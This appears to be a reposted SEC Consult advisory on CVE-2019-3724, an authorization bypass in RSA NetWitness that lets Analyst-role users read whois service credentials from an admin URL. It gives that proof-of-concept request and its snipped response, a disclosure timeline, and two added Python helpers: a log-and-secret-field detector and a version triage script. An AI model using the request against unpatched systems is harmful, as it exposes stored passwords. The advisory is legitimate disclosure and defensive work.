RSA NetWitness Authorization Bypass

2019-05-15 00:00:00
Mantas Juskauskas
packetstormsecurity.com

EPSS: 0.005 (percentile 75.7%)

SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >  
=======================================================================  
title: Authorization Bypass  
product: RSA NetWitness  
vulnerable version: <10.6.6.1, <11.2.1.1  
fixed version: 10.6.6.1, 11.2.1.1  
CVE number: CVE-2019-3724  
impact: Medium  
homepage: https://www.rsa.com  
found: 2018-09-18  
by: Mantas Juskauskas (Office Vilnius)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"RSA provides more than 30,000 customers around the world with the essential  
security capabilities to protect their most valuable assets from cyber  
threats. With RSA's award-winning products, organizations effectively detect,  
investigate, and respond to advanced attacks; confirm and manage identities;  
and ultimately, reduce IP theft, fraud, and cybercrime."  
  
Source: https://www.rsa.com/en-us/company/about  
  
  
Business recommendation:  
------------------------  
By exploiting the vulnerability documented in this advisory, an unauthorized  
attacker can access an administrative resource that may contain plaintext  
credentials for a third-party system.  
  
The vendor provides a patch which should be installed on affected systems.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The authorization mechanism provided by the platform is prone to an authorization  
bypass vulnerability, which can be easily exploited by authenticated (but low  
privileged) remote attackers to gain access to administrative information,  
including plaintext passwords.  
  
  
Proof of concept:  
-----------------  
A logged-in low privileged user (e.g. with role Analyst) is able to access  
an administrative resource by calling the following URL:  
  
https://[host]/admin/system/whois/properties  
  
After the above URL is accessed, the server returns the following HTTP response,  
which contains sensitive information for a third-party whois service, including  
plaintext passwords:  
  
HTTP/1.1 200 OK  
Server: nginx  
Date: [snip]  
Content-Type: application/json;charset=UTF-8  
Connection: close  
X-Frame-Options: SAMEORIGIN  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Pragma: no-cache  
Expires: Thu, 01 Jan 1970 00:00:00 GMT  
X-Content-Type-Options: nosniff  
Strict-Transport-Security: max-age=31536000 ; includeSubDomains  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
Set-Cookie: [snip]  
Content-Length: 795  
  
{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":100000,"cacheMaxSize":50000,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":100000,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":2592000000},"cache-max-size":50000,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":60000}}}}  
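As an added defender-side example (not part of the advisory and not RSA NetWitness code), the script below does two things a responder would want after reading the proof of concept above: it scans constructed nginx-style access log lines for successful requests to /admin/ paths made by principals whose role is not administrative, which is the signature of this bypass in a web server log, and it walks a JSON body shaped like the response above to list the keys under which secrets are returned verbatim. The log format with a trailing role= field, the role names, the host names and every value in the sample data are assumptions made for this example.

```python
import json
import re
from typing import Iterator, List, Tuple

# Constructed nginx-style access log lines with a hypothetical trailing
# "role=" field (an assumption for this example; not real NetWitness logs).
SAMPLE_LOG = """\
10.0.0.5 - analyst1 [15/May/2019:10:01:02 +0000] "GET /admin/system/whois/properties HTTP/1.1" 200 795 role=Analyst
10.0.0.7 - admin1 [15/May/2019:10:01:05 +0000] "GET /admin/system/whois/properties HTTP/1.1" 200 795 role=Administrator
10.0.0.5 - analyst1 [15/May/2019:10:02:10 +0000] "GET /investigation/events HTTP/1.1" 200 1200 role=Analyst
10.0.0.9 - analyst2 [15/May/2019:10:03:00 +0000] "GET /admin/system/whois/properties HTTP/1.1" 403 0 role=Analyst
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) role=(?P<role>\S+)$'
)

# Assumed role model: only these roles may legitimately reach /admin/ paths.
ADMIN_ROLES = frozenset({"Administrator"})
ADMIN_PREFIX = "/admin/"


def parse_log(text: str) -> Iterator[dict]:
    """Yield one dict per well-formed log line; unparseable lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec


def find_admin_access_by_non_admins(
    text: str,
    admin_roles=ADMIN_ROLES,
    admin_prefix: str = ADMIN_PREFIX,
) -> List[Tuple[str, str, int]]:
    """Return (user, path, status) for successful /admin/ requests by non-admin roles.

    A 403 from the same path is the expected outcome and is not reported;
    a 2xx is what the bypass described in the advisory looks like in the log.
    """
    return [
        (r["user"], r["path"], r["status"])
        for r in parse_log(text)
        if r["path"].startswith(admin_prefix)
        and r["role"] not in admin_roles
        and 200 <= r["status"] < 300
    ]


# Key names whose values should never be returned verbatim by an API.
SECRET_KEY_RE = re.compile(r"^(pw|password|passwd|secret|token|api[-_]?key)$", re.I)


def find_secret_fields(obj, prefix: str = "") -> List[str]:
    """Return dotted paths of non-empty string values stored under secret-looking keys."""
    found: List[str] = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            path = f"{prefix}.{key}" if prefix else key
            if SECRET_KEY_RE.match(key) and isinstance(value, str) and value:
                found.append(path)
            found.extend(find_secret_fields(value, path))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            found.extend(find_secret_fields(value, f"{prefix}[{i}]"))
    return found


# Constructed body mirroring the shape of the response in the advisory;
# every value here is made up for the example.
SAMPLE_RESPONSE = json.loads(
    '{"success":true,"data":{"queryUrl":"https://whois.example","authUrl":"https://auth.example",'
    '"userId":"svc-whois","pw":"CONSTRUCTED-SECRET","allowedRequests":100,'
    '"settings":{"query-url":"https://whois.example","password":"CONSTRUCTED-SECRET",'
    '"user-id":"svc-whois","allowed-requests-interval-seconds":{"seconds":60}}}}'
)


if __name__ == "__main__":
    for user, path, status in find_admin_access_by_non_admins(SAMPLE_LOG):
        print(f"ALERT: non-admin {user} received {status} from {path}")
    for path in find_secret_fields(SAMPLE_RESPONSE):
        print(f"secret value returned verbatim at {path}")
```

Run against real access logs, the first function needs the role lookup adapted to however the deployment records the principal (a session-to-role join from the application's audit log is the usual source); the second is useful as a regression test on the patched endpoint, since a correctly fixed server should return 403 for the Analyst role and, ideally, never echo the whois password even to administrators.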
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The identified vulnerability has been verified to exist in the  
RSA NetWitness platform, version 11.1.0.1.  
  
According to the vendor, platform version 10 is also affected.  
  
The following versions are vulnerable:  
* <10.6.6.1  
* <11.2.1.1  
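As an added triage helper that is not part of the advisory: the functions below encode the vulnerable ranges stated on this page (below 10.6.6.1 and below 11.2.1.1, with 10.6.6.1 and 11.2.1.1 as the fixed builds, and 11.3 confirmed unaffected by the vendor) so that an inventory of NetWitness hosts can be checked in one pass. The host names and version strings in the sample inventory are constructed; the helper encodes nothing beyond the ranges this advisory states.

```python
from typing import Dict, List, Tuple

# Fixed versions stated in the advisory for CVE-2019-3724.
FIXED_10 = (10, 6, 6, 1)
FIXED_11 = (11, 2, 1, 1)


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse a dotted numeric version such as '11.1.0.1' into a 4-tuple.

    Shorter strings are padded with zeros, so '11.3' compares as 11.3.0.0.
    """
    parts = text.strip().split(".")
    if not parts or len(parts) > 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))


def is_affected(version: str) -> bool:
    """True when the version falls inside one of the advisory's vulnerable ranges.

    The ranges are taken literally from the advisory: anything below 10.6.6.1,
    and anything on the 11 branch below 11.2.1.1. The fixed builds, 11.3 and
    anything newer fall outside both ranges and return False.
    """
    v = parse_version(version)
    if v < FIXED_10:
        return True
    return v[0] == 11 and v < FIXED_11


def triage(inventory: Dict[str, str]) -> List[str]:
    """Return the host names whose reported version is affected, sorted."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))


# Constructed inventory for the example; host names and versions are made up.
SAMPLE_INVENTORY = {
    "nw-admin-01": "11.1.0.1",
    "nw-admin-02": "11.2.1.1",
    "nw-legacy-01": "10.6.5.0",
    "nw-legacy-02": "10.6.6.1",
    "nw-new-01": "11.3",
}

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"{host}: {SAMPLE_INVENTORY[host]} is affected, patch to a fixed build")
```

The check deliberately treats the 11 branch separately: 11.2.1.1 is newer than 10.6.6.1 under plain tuple comparison, yet 11.1.0.1 is vulnerable while 10.6.6.1 is not, so a single "less than the latest fix" comparison would misclassify the 10.x fleet.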
  
  
Vendor contact timeline:  
------------------------  
2018-10-01: Contacting vendor through PGP via [email protected]  
2018-10-02: Vendor acknowledges the information was received, forwards  
the info to the relevant department  
2018-10-11: Vendor confirms the impact of the authorization issue,  
starts to work on the remediation timeline  
2018-10-15: Vendor provides additional information  
2018-10-22: Contacting vendor to provide the remediation timeline  
2018-10-23: Further email exchange related to the remediation timeline  
2019-01-18: Vendor provides an update on the fix timeline  
2019-03-05: Asking for a status update  
2019-03-06: Vendor provides a status update on the release: the patch for  
platform version 11 will be released in March, the one for version 10  
in mid-April  
2019-04-01: Asking for a specific release date & further status update  
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,  
they will inform us  
2019-05-06: Asking for a status update; no answer  
2019-05-09: Noticed that the new release has been online for a while now, asking  
the vendor for a status update again  
2019-05-09: Vendor: published security advisory URL and CVE  
2019-05-15: SEC Consult advisory release  
  
  
Solution:  
---------  
The following patched versions address the identified issue:  
* 11.2.1.1  
* 10.6.6.1  
  
Security advisory of the vendor: https://community.rsa.com/docs/DOC-104202  
  
The vendor specifically told us that version 11.3 is not affected by this  
vulnerability.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF M. Juskauskas / @2019  
  
